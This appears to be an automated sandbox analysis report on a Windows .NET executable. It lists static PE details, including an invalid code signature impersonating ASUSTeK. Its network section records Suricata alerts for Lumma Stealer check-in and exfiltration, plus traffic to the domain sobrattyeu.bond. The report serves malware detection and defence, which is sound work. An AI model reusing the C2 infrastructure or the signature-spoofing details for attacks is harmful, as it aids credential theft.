                          SHA256:ae0ad87b9d4cb0599d08afc3890f98d62c7cf02405ed8aab3d5238814d90febb
                          SHA512:1bb70599944f5c5f0a69a35bbd363510536436608b0cbc76ef6eefda3c9714fac23ff514a1c8e32e4308e1914ccb26cc20d43a4defaf88015d59194b4ea71689
                          SSDEEP:12288:ZA0WUbY6uDdzIu5ijuCwTgdMXg7z0xlo2c2gNJ:K0g68I0AuaB2cTJ
                          TLSH:E0A4D0286664D93BC26E47BAF4A39101A3FAA0C7ED51E745BC9418F14D12384AF352FF
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2.................0.............>.... ... ....@.. .......................@............`................................

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0x421a3e
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Authenticode Signature

                          Signature Valid:false
                          Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 08/10/2020 01:00:00 12/10/2023 13:00:00
                          Subject Chain
                          • CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
                          Version:3
                          Thumbprint MD5:332CDC164B1324C3FF3F64E228C5FFFC
                          Thumbprint SHA-1:CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
                          Thumbprint SHA-256:531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
                          Serial:0C9838F673F9B1CCE395CFAB2B6684E4

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x219f00x4b.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x598.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x6ce000x2670.idata
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x219a70x1c.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x1fa440x1fc007c297cc8f463f81875ed0f7ba3dd3ff0False0.4013056717519685data5.796591200875089IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x220000x5980x600511dd0b163083f747b4fa3f1e450067cFalse0.41015625data4.038713703339799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x240000xc0x200b1171333753a88cda4e7356665065f4cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .idata0x260000x4c6000x4c600366e5eae475695c99103b02a700072cdFalse1.0003388400163666data7.999481353291953IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0x220a00x30cdata0.41923076923076924
                          RT_MANIFEST0x223ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2025-01-15T16:16:08.174345+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.96.1443TCP
                          2025-01-15T16:16:08.699297+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.96.1443TCP
                          2025-01-15T16:16:08.699297+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.96.1443TCP
                          2025-01-15T16:16:09.762669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.96.1443TCP
                          2025-01-15T16:16:10.264589+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449733104.21.96.1443TCP
                          2025-01-15T16:16:10.264589+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.96.1443TCP
                          2025-01-15T16:16:11.165133+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.96.1443TCP
                          2025-01-15T16:16:24.157230+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.96.1443TCP
                          2025-01-15T16:16:25.542673+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.96.1443TCP
                          2025-01-15T16:16:26.775321+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.96.1443TCP
                          2025-01-15T16:16:27.517223+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449748104.21.96.1443TCP
                          2025-01-15T16:16:28.553985+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.96.1443TCP
                          2025-01-15T16:16:34.346120+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.96.1443TCP
                          2025-01-15T16:16:34.853352+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449750104.21.96.1443TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 15, 2025 16:16:07.644648075 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:07.644690037 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:07.644768953 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:07.647718906 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:07.647732973 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:08.174280882 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:08.174345016 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:08.180949926 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:08.180983067 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:08.181392908 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:08.230165958 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:08.281390905 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:08.281419039 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:08.281689882 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:08.699256897 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:08.699537039 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:08.699595928 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.080420971 CET49731443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.080444098 CET44349731104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:09.301959991 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.302022934 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:09.302112103 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.302386999 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.302423954 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:09.762578964 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:09.762669086 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.763951063 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.763992071 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:09.764339924 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:09.765836954 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.765836954 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:09.765942097 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264607906 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264684916 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264727116 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264738083 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.264755011 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264795065 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264833927 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.264837980 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264852047 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264878988 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.264955997 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264997005 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.264997959 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.265007973 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.265316010 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.265362978 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.265371084 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.265412092 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.269345045 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.323966026 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.350435972 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.350603104 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.350663900 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.350716114 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.350729942 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.350797892 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.350805998 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.350831032 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.350881100 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.351125002 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.351138115 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.351155043 CET49733443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.351162910 CET44349733104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.484512091 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.484561920 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:10.484642029 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.485071898 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:10.485088110 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:11.165040970 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:11.165132999 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:11.166351080 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:11.166368008 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:11.166697025 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:11.176815987 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:11.176815987 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:11.176868916 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:11.180592060 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:11.180608988 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:23.658246040 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:23.658369064 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:23.658502102 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:23.658659935 CET49737443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:23.658679008 CET44349737104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:23.678132057 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:23.678189993 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:23.680454969 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:23.680758953 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:23.680782080 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:24.157149076 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:24.157229900 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:24.159110069 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:24.159123898 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:24.159363031 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:24.167326927 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:24.167452097 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:24.167499065 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:24.978060007 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:24.978176117 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:24.978230000 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:24.978461981 CET49746443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:24.978485107 CET44349746104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:25.067162037 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:25.067271948 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:25.067392111 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:25.067722082 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:25.067739010 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:25.542591095 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:25.542673111 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:25.544950962 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:25.544964075 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:25.545201063 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:25.546843052 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:25.546979904 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:25.547013998 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:25.547071934 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:25.547080994 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.189145088 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.189265013 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.192616940 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.192908049 CET49747443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.192955017 CET44349747104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.311808109 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.311851025 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.312201023 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.312526941 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.312536955 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.775008917 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.775321007 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.777121067 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.777132034 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.777385950 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:26.778732061 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.778732061 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:26.778768063 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:27.517220974 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:27.517323017 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:27.517376900 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:27.531589985 CET49748443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:27.531619072 CET44349748104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.086671114 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.086699963 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.086781025 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.087137938 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.087152958 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.553857088 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.553985119 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.555377007 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.555386066 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.555623055 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.556827068 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.557523966 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.557559967 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.557661057 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.557704926 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.557804108 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.557852983 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.557961941 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.557992935 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.558113098 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.558146000 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.558286905 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.558320045 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.558327913 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.558677912 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.558715105 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.568193913 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.568365097 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.568401098 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.568416119 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.568432093 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.568440914 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.568486929 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.568542957 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.568588972 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.568634987 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.573245049 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:28.573307991 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:28.573323011 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:33.855189085 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:33.855494022 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:33.855567932 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:33.855735064 CET49749443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:33.855767012 CET44349749104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:33.860513926 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:33.860584021 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:33.860656977 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:33.860948086 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:33.860965967 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.345982075 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.346120119 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.347466946 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.347484112 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.347866058 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.349489927 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.349522114 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.349570990 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.853410006 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.853645086 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.853740931 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.853832960 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.853833914 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.853879929 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.853903055 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.854015112 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.854063034 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.854073048 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.854170084 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.854226112 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.854233027 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.857933044 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.857995033 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.858023882 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.858218908 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.858272076 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.858423948 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.858449936 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.858474016 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.858481884 CET44349750104.21.96.1192.168.2.4

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 15, 2025 16:16:07.627458096 CET5576153192.168.2.41.1.1.1
                          Jan 15, 2025 16:16:07.640410900 CET53557611.1.1.1192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 15, 2025 16:16:07.627458096 CET192.168.2.41.1.1.10x89f4Standard query (0)sobrattyeu.bondA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 15, 2025 16:16:07.640410900 CET1.1.1.1192.168.2.40x89f4No error (0)sobrattyeu.bond104.21.96.1A (IP address)IN (0x0001)false
                          Jan 15, 2025 16:16:07.640410900 CET1.1.1.1192.168.2.40x89f4No error (0)sobrattyeu.bond104.21.48.1A (IP address)IN (0x0001)false
                          Jan 15, 2025 16:16:07.640410900 CET1.1.1.1192.168.2.40x89f4No error (0)sobrattyeu.bond104.21.16.1A (IP address)IN (0x0001)false
                          Jan 15, 2025 16:16:07.640410900 CET1.1.1.1192.168.2.40x89f4No error (0)sobrattyeu.bond104.21.64.1A (IP address)IN (0x0001)false
                          Jan 15, 2025 16:16:07.640410900 CET1.1.1.1192.168.2.40x89f4No error (0)sobrattyeu.bond104.21.80.1A (IP address)IN (0x0001)false
                          Jan 15, 2025 16:16:07.640410900 CET1.1.1.1192.168.2.40x89f4No error (0)sobrattyeu.bond104.21.112.1A (IP address)IN (0x0001)false
